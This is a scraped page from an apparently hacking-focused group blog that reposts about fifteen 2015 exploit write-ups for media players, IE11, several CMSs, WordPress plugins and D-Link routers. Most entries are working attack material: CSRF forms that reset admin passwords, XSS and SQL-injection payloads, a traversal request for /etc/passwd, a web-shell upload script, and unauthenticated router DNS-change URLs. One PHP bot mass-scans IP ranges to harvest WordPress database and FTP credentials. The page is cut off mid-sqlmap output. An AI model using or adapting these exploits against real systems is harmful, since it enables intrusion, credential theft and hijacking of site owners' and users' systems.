# Exploit Title: foobar2000 1.3.8 (.m3u) Local Crash PoC
# Date: 12-06-2015
# Exploit Author: 0neb1n
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/e246984718ab7ab58fa1e0b072ff05a4/foobar2000_v1.3.8.exe
# Version: 1.3.8
# Tested on: Windows XP SP3 KOR
file = "poc.m3u"
data = 'http://' + '\x41' * 200000
fd = open(file, 'w')
fd.write(data)
fd.close()
print ""
print "[*] File successfully created !!"
print "[*] Author : 0neb1n"
print "[*] Mail : barcodecrow(at)gmail(dot)com"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863147291
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/python
# Exploit Title: GoldWave 6.1.2 (URL) Local Crash Exploit
# Date: 12-06-2015
# Exploit Author: 0neb1n
# Vendor Homepage: http://www.goldwave.com/
# Software Link: http://goldwave.com/downloads/InstallGoldWave612.exe
# Version: 6.1.2
# Tested on: Windows 8.1 Home KR
# Step 1 : Make poc.txt and copy "http://AAAAAAAA..."
# Step 2 : run GoldWave 6.1.2 -> File -> Open URl -> Paste "http://AAAAAA..."
# step 3 : Boom!!
file = "poc.txt"
data = 'http://' + '\x41' * 200000
fd = open(file, 'w')
fd.write(data)
fd.close()
print ""
print "[*] File successfully created !!"
print "[*] Author : 0neb1n"
print "[*] Mail : barcodecrow(at)gmail(dot)com"
# Exploit Title: CSRF, Persistent XSS & LFI
# Google Dork: intitle: CSRF, Persistent XSS & LFI
# Date: 2015-06-11
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: kilrizzy.github.io/Nakid-CMS
# Software Link: kilrizzy.github.io/Nakid-CMS
# Version: kilrizzy-Nakid-CMS-f274624
# Tested on: windows 7 on XAMPP
# Category: webapps
Vendor:
================================
http://kilrizzy.github.io/Nakid-CMS/
Product:
================================
kilrizzy-Nakid-CMS-f274624
Nakid CMS is an open source content management system built using PHP and
CodeIgniter.
Setup mode:
==========
Under root dir for Nakid CMS we set to production mode instead of
development in index.php.
e.g. define('ENVIRONMENT', 'production');
Advisory Information:
================================================
CSRF, Persistent XSS & Auth bypass LFI
Vulnerability Details:
=====================
Multiple CSRF(s) exist:
We have ability to do the following as no CSRF tokens are present.
1-Change Admin password
2-Add arbitrary users to system
3-Alter system settings
XSS (persistent):
XSS parameter vulnerabilities exist for the following:
payloads will be stored in the MySQL database and activated when a victim
visits the vulnerable webpage.
XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users
On the "Edit Record" pop up dialog box.
Vulnerable parameters:
---------------------
username
password
email
fname
lname
XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
On the "Edit Record" pop up dialog box.
Vulnerable parameters:
---------------------
from_name
include_path
primary_email
from_email
XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1
Vulnerable parameter:
--------------------
title
Authentication bypass LFI:
Local file inclusion to bypass access controls and read aribitrary files
exist by setting '$url' PHP variable on following URL
index.php/connector$url
Exploit POC code(s):
====================
CSRF(s):
========
Condition:
Pursuade victim to visit our webpage or click our link, if they have a
session then we do our CSRF!.
1- Add arbitrary user to system
--------------------------------
<!DOCTYPE>
<html>
<head>
<script>
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/users"
method="post">
<input type="text" name="username" value="sum1" />
<input type="text" name="password" value="abc123" />
<input type="text" name="email" value="X@X.com"/>
<input type="text" name="fname" value="sum"/>
<input type="text" name="lname" value="1"/>
<input type="text" name="oper" value="add"/>
<input type="text" name="id" value="_empty"/>
</form>
</body>
</html>
2-Change Admin password
------------------------
<!DOCTYPE>
<html>
<head>
<script>
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/profile"
method="post">
<input type="text" name="username" value="admin" />
<input type="text" name="password" value="xyz123" />
<input type="text" name="email" value="hell@abyss.com"/>
<input type="text" name="fname" value="hyp3r"/>
<input type="text" name="lname" value="linx"/>
<input type="text" name="action" value="edit_profile"/>
<input type="text" name="submitbt" value="Save"/>
</form>
</body>
</html>
3-Alter system settings
-----------------------
<!DOCTYPE>
<html>
<head>
<script>
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/settings"
method="post">
<input type="text" name="value" value="HELL@ABYSS.com" />
<input type="text" name="oper" value="edit" />
<input type="text" name="id" value="1"/>
</form>
</body>
</html>
XSS persistent POC code:
=======================
Inject <script>alert(666)</script> into any of the following vulnerable
fields described above using POST method.
Need to highlight a row then click edit dialog box to edit settings.
e.g.
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
from_name <------- <script>alert(666)</script>
include_path
primary_email
from_email
Authorization bypass LFI:
========================
1- Logout, create a hell.txt file or whatever and put in 'htdocs' or web
root, then visit the URL (change to suit your environment).
2-
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt
OR try
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php
Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 11, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] GET & POST
Vulnerable Product: [+] kilrizzy-Nakid-CMS-f274624
Vulnerable Parameter(s): [+]
username
password
email
fname
lname
from_name
include_path
primary_email
from_email
title
connector$url
Affected Area(s): [+] /system/users
/system/profile
/system/content_edit/
===============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
(hyp3rlinx)
# Exploit title: Opsview 4.6.2 - Multiple XSS
# Date: 07-06-2015
# Vendor homepage: www.opsview.com
# Version: 4.6.2
# CVE: CVE-2015-4420
# Author: Dolev Farhi @dolevf
# Tested On: Kali Linux + Windows 7
# Details:
# --------
# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version
1. Stored XSS through a malicious check plugin
a. Create a plugin with the following content:
#!/bin/bash
echo '<script>alert("script0t0s")</script>'
exit 2
b. create a new check and assign this plugin.
c. once a host uses this check, navigate to the event page, the XSS will be injected.
d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement.
2. Stored XSS in host profile
a. add a host
b. in the description of the host, add a description as the one below:
<script>alert(document.cookie)</script>
c. save settings
d. once a user/admin views the host settings, XSS will be injected.
3. Reflected XSS in Test service check page.
a. Add a new service check
b. Test the new service check against any host and provide in the command line the following <script>alert("test")</script>
c. the XSS will immediately reflect to the screen.
response output:
POST /state/service/166/exec HTTP/1.1
Host: 192.168.0.20
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview
Content-Length: 105
Cookie: PHPSESSID=
auth_tkt=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915
# Exploit Title: SQL Injection & Persistent XSS
# Google Dork: intitle: SQL Injection & Persistent XSS
# Date: 2015-06-12
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: zencherry.com
# Software Link: sourceforge.net/projects/zencherrycms
# Version: 1.1
# Tested on: windows 7 on Apache Tomcat
# Category: webapps
Vendor:
=============================================
http://zencherry.com/
http://sourceforge.net/projects/zencherrycms
Product:
==================================================
ZCMS 1.1 JavaServer Pages Content Management System
Advisory Information:
==============================
SQL Injection & Persistent XSS
Vulnerability Details:
======================
SQL Injection (CVE-2015-7346):
Login to admin area requires a password but is easily bypassed
using classic SQLInjection method because application uses
concatenated user input to construct SQL queries.
ZCMS exploitable admin login code:
==================================
squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users
WHERE
status = 0 AND username = '"+username+"' AND password =
'"+request.getParameter("pass") +"' AND type = 1 ;";
So we just supply an Admin password like ---> HELL' OR '2'='2
which will resolve as true!
SQL Inject XSS Payload:
=======================
We can also inject persisten XSS payload directly to MySQL database
subverting
all character filtering leveraging existing SQLInjection vulnerabilities.
Persistent XSS (CVE-2015-7347):
===============
Another persistent XSS vector is here in author field for comments:
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
number]
Exploit code(s):
===============
1) Bypass admin login
---------------------
localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login
Enter 'admin' for username field
Enter HELL' OR '2'='2 for the pass field
2) Inject XSS using SQL Injection
---------------------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title=
"<script>alert(1)</script>
&content=<script>alert(1)</script>&author=<script>alert(1)</script>
SATAN&visibility=1&type=1&comm=0
3) Persistent XSS field
-----------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
number]
Inject <script>alert(666)</script> in author input field.
Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 12, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] GET & POST
Vulnerable Product: [+] ZCMS_1.1
Vulnerable Parameter(s): [+] pass, title, content, author
Affected Area(s): [+] Admin, CMS
===============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar,
provided that
due credit is given to the author. The author is not responsible for any
misuse of the
information contained herein and prohibits any malicious use of all
security related
information or exploits by the author or elsewhere.
(hyp3rlinx)
Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/
Description:
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.
Vulnerability:
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.
This vulnerability doesn’t require authentication to the Wordpress site.
File ./se-html5-album-audio-player/download_audio.php:
3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
5 // make sure it's a file before doing anything!
6 if( is_file($file_name) && $is_in_uploads_dir !== false ) {
7
8 // required for IE
9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); }
10
11 // get the file mime type using the file extension
12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
13 case 'pdf': $mime = 'application/pdf'; break;
14 case 'zip': $mime = 'application/zip'; break;
15 case 'jpeg':
16 case 'jpg': $mime = 'image/jpg'; break;
17 default: $mime = 'application/force-download';
18 }
19 header('Pragma: public'); // required
20 header('Expires: 0'); // no cache
21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
23 header('Cache-Control: private',false);
24 header('Content-Type: '.$mime);
25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
26 header('Content-Transfer-Encoding: binary');
27 header('Content-Length: '.filesize($file_name)); // provide file size
28 header('Connection: close');
29 readfile($file_name); // push it out
30 exit();
The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory.
CVEID: 2015-4414
OSVDB:
Exploit Code:
• $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plugins@wordpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.
In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user:
1 <?php
2
3 $filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
4 if (file_exists($filename)) {
5 include_once($filename);
6 } else {
7 include_once("../../../../wp-load.php");
8 }
9 echo "Here";
10 $image_file = $_FILES['gf_aviary_file'];
11 if($image_file['name']!=''){
12 $max_file_size = 4*1024*1024;
13 $file_size = intval($image_file['size']);
14 if( $file_size > $max_file_size ){
15 $msg = "File Size is too big.";
16 $error_flag = true;
17 }
18 $extension = strtolower(end(explode('.', $image_file['name'])));
19 $aa_options = get_option('gf_aa_options');
20 $supported_files = $aa_options['supported_file_format'];
21 $supported_files = strtolower($supported_files);
22 if(!$error_flag && $supported_files != '' ){
23 $supported_files = explode (',', $supported_files);
24 if(!in_array($extension, $supported_files)){
25 $msg = "No Supported file.";
26 $error_flag = true;
27 }
28 }
29 if(!$error_flag){
30 $wp_upload_dir = wp_upload_dir();
31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
32 mkdir($wp_upload_dir['basedir'].'/gform_aviary');
33 }
34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
36 $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name' ];
37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){
38 $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na me'];
39 }
40 }
41 $return_obj = array('status' => 'success', 'message' => $file_url);
42 echo json_encode($return_obj);
43 }
44 ?>
CVEID: 2015-4455
OSVDB:
Exploit Code:
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/
$target_url = 'http://server/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
$file_name_with_full_path = '/var/www/shell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
<!--
# Exploit title: Microsoft Internet Explorer 11 Crash PoC
# Date: 07.06.2015
# Vulnerable version: 11 (newest at the time 11.0.9600.17801)
# Tested on: Windows 7/8.1
# Author: Pawel Wylecial
# http://howl.overflow.pl @h0wlu
-->
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
var divA = document.createElement("div");
document.body.appendChild(divA);
try {
//divA.contentEditable = "true";
divA.outerHTML = "AAAA";
var context = divA['msGetInputContext']();
}
catch (exception) {
}
}
</script>
</head>
<body onload='boom();'>
</body>
</html>
<!--
(2534.480c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98
eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000 test dword ptr [ecx+8],100000h ds:002b:00000008=????????
-->
D-Link DSL-2730B AU_2.01
Authentication Bypass DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
This security hole allows an attacker to bypass
authentication and change the DNS. When the
administrator is logged in the web management
interface, an attacker may be able to completely
bypass authentication phase and connect to the
web management interface with administrator's
credentials. This attack can also be performed
by an external attacker who connects to the
router's public IP address, if remote management
is enabled. To change the DNS without logging
into web management interface use the following URL:
http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
D-Link DSL-526B ADSL2+ AU_2.01
Unauthenticated Remote DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
No description for morons,
script kiddies & noobs !!
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2"
var dns2 = '8.8.8.8';
# Exploit Title: wp-imagezoom Remote Image Upload
# Google Dork: filetype:php inurl:"/wp-content/plugins/wp-imagezoom" & inurl:"?id="
# Date: 06.06.2015
# Exploit Author: T3N38R15
# Software Link: https://downloads.wordpress.org/plugin/wp-imagezoom.1.1.0.zip
# Version: 1.1.0
# Tested on: Windows (Firefox)
Linux (Firefox)
The affected file is the div_img.php it allowed anybody to upload jpg files.
/wp-content/plugins/wp-imagezoom/div_img.php?src=http://domain.com/img.jpg&cl=100&dl=100
would upload the file to the default directory :
/wp-content/plugins/wp-imagezoom/work/http_cln__sls__sls_domain.com_sls_img.jpg/
the first one is then your picture ( it is only 469x469 the rest is cut out ), the other are zoomed/cuttet version of it.
it also support a FPD :
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=
the variable org_img have the value of the current location to the work directory.
We can also delete entry's with
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=
following options are avaliable for the cmd parameter :
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delall
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delunn
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delone&src=yourwisheddeleted
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delovr&maxsize=size of image
Proof of concept : http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=http://static.zerochan.net/Frankenstein.(Noblesse).full.415661.jpg&cl=100&dl=100
Greets to Team Madleets/leets.pro & VIRkid ;)
Regards T3N38R15
######################################################################################
# Exploit Title: Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability #
# Date: june 6, 2015 #
# Exploit Author: ViRuS OS #
# Google Dork: inurl:?fdx_switcher=mobile #
# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/ #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip #
# Version: WP Mobile Edition Version 2.2.7 #
# Tested on : windows #
######################################################################################
Description :
Wordpress Plugin 'WP Mobile Edition' is not filtering data so we can get the configration file in the path
< site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php>
# Exploite Code :
<?php
//ViRuS OS
set_time_limit(0);
error_reporting(0);
echo "############### Fdx_Switcher MiniBot By ip Range ##################\n\n";
print " Coded By _
__ _(_)_ __ _ _ ___ ___ ___
\ \ / / | '__| | | / __| / _ \/ __|
\ V /| | | | |_| \__ \ | (_) \__ \
\_/ |_|_| \__,_|___/ \___/|___/
Greets >> CoderLeeT | Fallag Gassrini | Taz| S4hk | Sir Matrix | Kuroi'SH
";
echo "Follow Me On FaceBook : https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook : https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Welcome Master ViRuS OS ################\n\n";
echo "Server Target IP : ";
$ip=trim(fgets(STDIN,1024));
$ip = explode('.',$ip);
$ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.';
for($i=0;$i <= 255;$i++)
{
$sites = array_map("site", bing("ip:$ip.$i wordpress"));
$un=array_unique($sites);
echo "[+] Scanning -> ", $ip.$i, ""."\n";
echo "Found : ".count($sites)." sites\n\n";
foreach($un as $pok){
$host=findit($file,"DB_HOST', '","');");
$db=findit($file,"DB_NAME', '","');");
$us=findit($file,"DB_USER', '","');");
$pw=findit($file,"DB_PASSWORD', '","');");
$bda="http://$pok";
$linkof='/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php';
$dn=($bda).($linkof);
$file=@file_get_contents($dn);
if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
echo "[+] Scanning => ".$bda."\n\n";
echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
$db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
$user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
$pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
$host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
$ux = "".$bda."\r\n";
$ux1 = "".$db."\r\n";
$ux2 = "".$user."\r\n";
$ux3 = "".$pass."\r\n";
$ux4 = "".$host."\r\n";
$save=fopen('exploited.txt','ab');
fwrite($save,"$ux");
fwrite($save,"$ux1");
fwrite($save,"$ux2");
fwrite($save,"$ux3");
fwrite($save,"$ux4");
}
elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n";
echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n";
echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n";
}
else{echo $bda." : Exploit failed \n\n";}
}
}
function findit($mytext,$starttag,$endtag) {
$posLeft = stripos($mytext,$starttag)+strlen($starttag);
$posRight = stripos($mytext,$endtag,$posLeft+1);
return substr($mytext,$posLeft,$posRight-$posLeft);
}
function site($link){
return str_replace("","",parse_url($link, PHP_URL_HOST));
}
function bing($what){
for($i = 1; $i <= 2000; $i += 10){
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
preg_match_all('#;a=(.*?)" h="#',$data, $links);
foreach($links[1] as $link){
$allLinks[] = $link;
}
if(!preg_match('#"sw_next"#',$data)) break;
}
if(!empty($allLinks) && is_array($allLinks)){
return array_unique(array_map("urldecode", $allLinks));
}
}
?>
=========================================================
[+] Title :- Pasworld detail.php Blind Sql Injection Vulnerability
[+] Date :- 5 - June - 2015
[+] Vendor Homepage: :- http://main.pasworld.co.th/
[+] Version :- All Versions
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- intext:"Powered By :: PAS World Communitcation" inurl:detail.php
site:go.th inurl:"detail.php?id="
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :- Team Alastor Breeze
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha
[+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com
=========================================================
[+] Severity Level :- High
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- detail.php?id=
[+] Affected Area(s) :- Entire admin, database, Server
=========================================================
[+] About :- Unauthenticated SQL Injection via "detail.php?id=" parameter
[+] SQL vulnerable File :- /home/DOMAIN/domains/DOMAIN.go.th/public_html/detail.php
[+] POC :- http://127.0.0.1/detail.php?id=[SQL]'
SQLMap
++++++++++++++++++++++++++
python sqlmap.py --url "http://127.0.0.1/detail.php?id=[SQL]" --dbs
++++++++++++++++++++++++++
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=152 AND 1414=1414
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=152 AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (CASE WHEN (1163=1163) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (random number) - 9 columns
Payload: id=-7470 UNION ALL SELECT 5982,5982,5982,5982,5982,CONCAT(0x7162766271,0x4b437a4a565555674571,0x7162707671),5982,5982,5982#
=========================================================
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
| Exploit Title: Milw0rm Clone Script v1.0 - (time based) SQLi |
| Date: 05.19.2015 |
| Exploit Daddy: pancaker |
| Vendor Homepage: http://milw0rm.sourceforge.net/ |
| Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download |
| Version: v1.0 |
| Tested On: Ubuntu 10.04 |
|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
| SHOUTout: milw0rm &&& your mums pancakes |
| CALLINGout: hak5 {crap to the core} &&& 1337day/inj3ct0r {scamm3rs + l33ch3rs} |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
### vuln codez related.php ###
<?
include("include/functions.php");
$related = htmlspecialchars(trim($_GET['program'])); <-- this isnt going to save u
$query = mysql_query("SELECT * FROM `exploits` WHERE `r`='".$related."'"); <- might as well b a straight get request lololol owned
$row = mysql_num_rows($query);
if($row){
?>
<html>
<head>
<title><? echo SiteInfo('site_name');?> - exploits : vulnerabilities : videos : papers : shellcode</title>
..zzz...
### manual ###
root@woop:~# zzz='10'
root@woop:~# lulz="program=hak5'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP($zzz)))a)%20AND%20'shit'='shit"
root@woop:~# time curl "http://localhost/milw0rm/related.php?$lulz"
real 0m10.008s
user 0m0.004s
sys 0m0.004s
### sqlmap ###
root@woop:~/sqlmap# python sqlmap.py -u 'http://localhost/milw0rm/related.php?program=lol' --current-user --is-dba
_
___ ___| |_____ ___ ___ {1.0-dev-e8f87bf}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
